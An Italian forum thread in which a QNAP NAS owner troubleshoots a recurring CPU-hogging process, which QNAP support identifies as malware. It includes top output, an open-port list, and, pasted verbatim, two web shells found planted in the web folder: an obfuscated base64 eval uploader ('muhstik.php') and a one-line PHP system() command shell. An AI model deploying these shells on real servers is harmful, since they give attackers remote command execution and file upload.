Processo spremi risorse

[lepitrust]

Ciao a tutti,
da qualche giorno ho notato che nel mio TS-453 PRO c'è uno strano processo in esecuzione che sfrutta quasi il 50% della cpu disponibile. Ho provato a disattivare tutte le app non necessarie, ma nulla... l'unica soluzione è stata killarlo da ssh, ma dopo poco torna...

Qualcuno sa a cosa possa essere dovuto?

Questo è preso dal comando top

Codice: Seleziona tutto

CPU: 57.1% usr  7.9% sys  0.1% nic 32.7% idle  0.2% io  0.0% irq  1.7% sirq
Load average: 5.50 4.24 3.33 8/1026 9067
  PID  PPID USER     STAT   VSZ %VSZ CPU %CPU COMMAND
 8049     1 httpdusr S     321m  4.0   0 48.3 {257853} sh

ho cercato se c'era qualcosa di anomalo in crontab, ma nulla...

Idee?

[lepitrust]

Codice: Seleziona tutto

12:42:10 up  2:07,  load average: 3.34, 2.17, 1.85
CPU: 54.1% usr  6.2% sys  2.0% nic 18.7% idle 18.7% io  0.0% irq  0.0% sirq
Load average: 3.34 2.17 1.85 3/998 23111
  PID  PPID USER     STAT   VSZ %VSZ CPU %CPU COMMAND
21211     1 httpdusr S     308m  3.9   3 49.9 {2521026} sh

Anche se continuo a killarlo continua a ricomparire...

report ps ax

Codice: Seleziona tutto

[~] # ps ax | grep 21211
21211 httpdusr   7708 S   sh

Queste sono le mie porte aperte

Codice: Seleziona tutto

PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
139/tcp   open  netbios-ssn
443/tcp   open  https
445/tcp   open  microsoft-ds
631/tcp   open  ipp
1723/tcp  open  pptp
2049/tcp  open  nfs
3306/tcp  open  mysql
3493/tcp  open  nut
4000/tcp  open  remoteanything
4001/tcp  open  newoak
8080/tcp  open  http-proxy
30000/tcp open  ndmps

non so più cosa tentare...

[lepitrust]

Allora... forse ne sono venuto a capo grazie a qualche suggerimento del supporto tecnico Qnap.
Dopo aver disattivato tutte le app di terze parti e tutti i servizi strettamente non necessari ho scoperto che con il web server attivo il problema si presenta. Disattivandolo il problema sparisce.
Allora ho ricontrollato la cartella Qweb e ho trovato degli eseguibili che non facevano parte del mio sito e che compaiono nella lista dei processi attivi di quando il problema c'è...

Adesso ho provato a cancellarli e riavviare il tutto, e vedo se il problema si ripresenta.

Se qualcuno è interessato allego dump con il problema, prima di cancellare i file e del dopo, con il problema forse risolto. In aggiunta anche zip con gli eseguibili incriminati. Erano lasciati nella cartella Qweb.

ciao

[lepitrust]

Risposta di QNAP:

Codice: Seleziona tutto

It appears to be a malware attack.

I've noted this and will escalate this to development with high priority.

Please be sure to keep your Malware Remover updated.

If it reoccurs, please let me know.

Kind regards,

[wozxyz]

Grazie per la condivisione!

[lepitrust]

Ciao a tutti,

di nuovo la stessa storia... processo spremi risorse su web server...
non capisco come diavolo riescano a creare i file...

Qualcuno ha qualche idea? Neanche il tool anti-malware ha trovato nulla...

muhstik.php

Codice: Seleziona tutto

<?php eval(base64_decode('ZWNobyAiPHRpdGxlPm11aHN0aWs8L3RpdGxlPjxiciAvPiI7CmVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPic7ZWNobyAnPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImZpbGUiIHNpemU9IjUwIj48aW5wdXQgbmFtZT0iX3VwbCIgdHlwZT0ic3VibWl0IiBpZD0iX3VwbCIgdmFsdWU9IlVwbG9hZCI+PC9mb3JtPic7IGlmKCAkX1BPU1RbJ191cGwnXSA9PSAiVXBsb2FkIiApIHsgaWYoQGNvcHkoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddLCAkX0ZJTEVTWydmaWxlJ11bJ25hbWUnXSkpIHsgZWNobyAnPGI+VXBsb2FkIERvbmUuPGI+PGJyPjxicj4nOyB9ZWxzZSB7IGVjaG8gJzxiPlVwbG9hZCBGYWlsZWQuPC9iPjxicj48YnI+JzsgfX0K')); ?>

A5932A7810268EF0AA42B9DDFC69C95F.php

Codice: Seleziona tutto

CMD2015<br><pre><?php @system($_GET['cmd']);?></pre>

[PiaNi]

Hai attivato il registro delle connessioni?

[maximuss]

Ciao a tutti,

di nuovo la stessa storia... processo spremi risorse su web server...
non capisco come diavolo riescano a creare i file...

Qualcuno ha qualche idea? Neanche il tool anti-malware ha trovato nulla...

Hai attivo wordpress o altri CMS?

[selvaggi]

più che la sicurezza del nas a me viene pensato ad un bug sul sito, hai un sito in php? magari wordpress, oppure drupal o robe simili? non sarebbe la prima volta.
per questi applicativi ci sono plugin che fanno da antivurs e firewall e vanno installati sul sito.

[lepitrust]

No, niente del genere solo un sitarello sviluppato da me, niente di particolarmente evoluto o strano.